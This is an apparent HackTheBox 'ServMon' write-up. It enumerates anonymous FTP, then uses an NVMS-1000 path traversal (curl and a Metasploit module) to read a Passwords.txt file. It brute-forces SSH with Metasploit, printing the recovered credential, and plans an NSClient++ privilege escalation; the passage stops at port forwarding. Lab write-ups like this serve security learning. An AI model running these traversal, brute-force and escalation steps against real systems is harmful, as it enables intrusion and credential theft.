TL;DR: We have to find some hints in a FTP, finds creds through a Path
Traversal in NVMS-1000 and gain a low privilege shell, then we EoP via
NSClient++ to get admin RCE.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 235.93 seconds
We want to look at FTP (21), Web servers (80 & 8443) and Samba (139,445) first.
Nmap told us it was possible to connect to FTP anonymously but found nothing to
list so let's try ourselves:
1 2 3 4 5 6 7 8 9 10 11 12 13
$ ftp 10.10.10.184 Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:noraj): Anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls -a 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:05PM <DIR> Users 226 Transfer complete.
$ searchsploit -p 46802 Exploit: NSClient++ 0.5.2.35 - Privilege Escalation URL: https://www.exploit-db.com/exploits/46802 Path: /usr/share/exploitdb/exploits/windows/local/46802.txt File Type: ASCII text, with very long lines, with CRLF line terminators
Hypothesis:
Once we have a low privileged shell it will be possible to run a command
(nscp web -- password --display) or read the config of NSClient++ to retrieve
a user password. Usually NSClient++ run as privileged user so with an app user
we could create some tasks that will be run by the app daemon and gain more
privileges.
It's a false positive occurring when there isn't an file extension.
(At first glance it's seems the exploit is not working or the server is
not vulnerable).
As we saw earlier with ftp CLI we didn't see anything.
But I tried again with FileZilla and saw two folders this time, with a file in
each:
Nadine/Confidential.txt
Nathan/Notes to do.txt
Confidential.txt
1 2 3 4 5 6 7
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
Notes to do.txt
1 2 3 4 5
1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
Let's use NVMS-1000 path traversal again but this time with:
Users/Nathan/Desktop/Passwords.txt thanks to the information we got on the FTP.
1 2 3
$ cat /usr/share/exploitdb/exploits/hardware/webapps/48311.py | dos2unix -c iso -q | python2 - http://10.10.10.184/ Users/Nathan/Desktop/Passwords.txt passwords.txt dos2unix: active code page: 0 Host not vulnerable to Directory Traversal!
No file but we are sure it's here. This exploit looks bad so it may be broken.
With curl no result either:
1 2 3 4 5 6
$ curl 'http://10.10.10.184/../../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt' --head HTTP/1.1 404 Not Found Content-type: text/html Content-Length: 0 Connection: close AuthInfo:
Name Current Setting Required Description ---- --------------- -------- ----------- DEPTH 13 yes Depth for Path Traversal FILEPATH /windows/win.ini yes The path to the file to read Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base URI path of nvms THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 10.10.10.184 RHOSTS => 10.10.10.184 msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH /Users/Nathan/Desktop/Passwords.txt FILEPATH => /Users/Nathan/Desktop/Passwords.txt msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run
With the looted passwords let's bruteforce SSH for the users nadine and nathan
by using a metasploit module.
1 2 3 4 5 6 7 8 9 10 11 12 13
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.184 RHOSTS => 10.10.10.184 msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/noraj/.msf4/loot/20200611175532_default_10.10.10.184_nvms.traversal_675310.txt PASS_FILE => /home/noraj/.msf4/loot/20200611175532_default_10.10.10.184_nvms.traversal_675310.txt msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/noraj/CTF/HackTheBox/machines/ServMon/usernames.txt USER_FILE => /home/noraj/CTF/HackTheBox/machines/ServMon/usernames.txt msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 10.10.10.184:22 - Success: 'nadine:L1k3B1gBut7s@W0rk' ''id' is not recognized as an internal or external command, operable program or batch file. ' [*] Command shell session 1 opened (10.10.15.26:45331 -> 10.10.10.184:22) at 2020-06-11 18:10:19 +0200 [-] 10.10.10.184:22 - While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with 'set gatherproof off'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
So a valid set of credentials was nadine:L1k3B1gBut7s@W0rk.
metasploit automatically opened us a session but with cmd.exe. But I prefer
to have a powershell shell.
1 2 3 4 5 6 7 8
$ ssh nadine@10.10.10.184 powershell.exe nadine@10.10.10.184's password: Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
# If you want to fill this file with all available options run the following command: # nscp settings --generate --add-defaults --load-all # If you want to activate a module and bring in all its options use: # nscp settings --activate-module <MODULE NAME> --add-defaults # For details run: nscp settings --help
; CheckTaskSched - Check status of your scheduled jobs. CheckTaskSched = enabled
; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA Scheduler = enabled
; CheckExternalScripts - Module used to execute external scripts CheckExternalScripts = enabled
; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments. [/settings/external scripts/wrappings]
; Batch file - Command used for executing wrapped batch files bat = scripts\\%SCRIPT% %ARGS%
; Visual basic script - Command line used for wrapped vbs scripts vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -
; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments` [/settings/external scripts/scripts]
; Schedules - Section for the Scheduler module. [/settings/scheduler/schedules]
; Undocumented key foobar = command = foobar
; External script settings - General settings for the external scripts module (CheckExternalScripts). [/settings/external scripts] allow arguments = true
allowed hosts = 127.0.0.1 tells us we can authenticate only from localhost.
But as we have an SSH access we can do some local port forwarding (you can read
about this technique on my article about pivoting).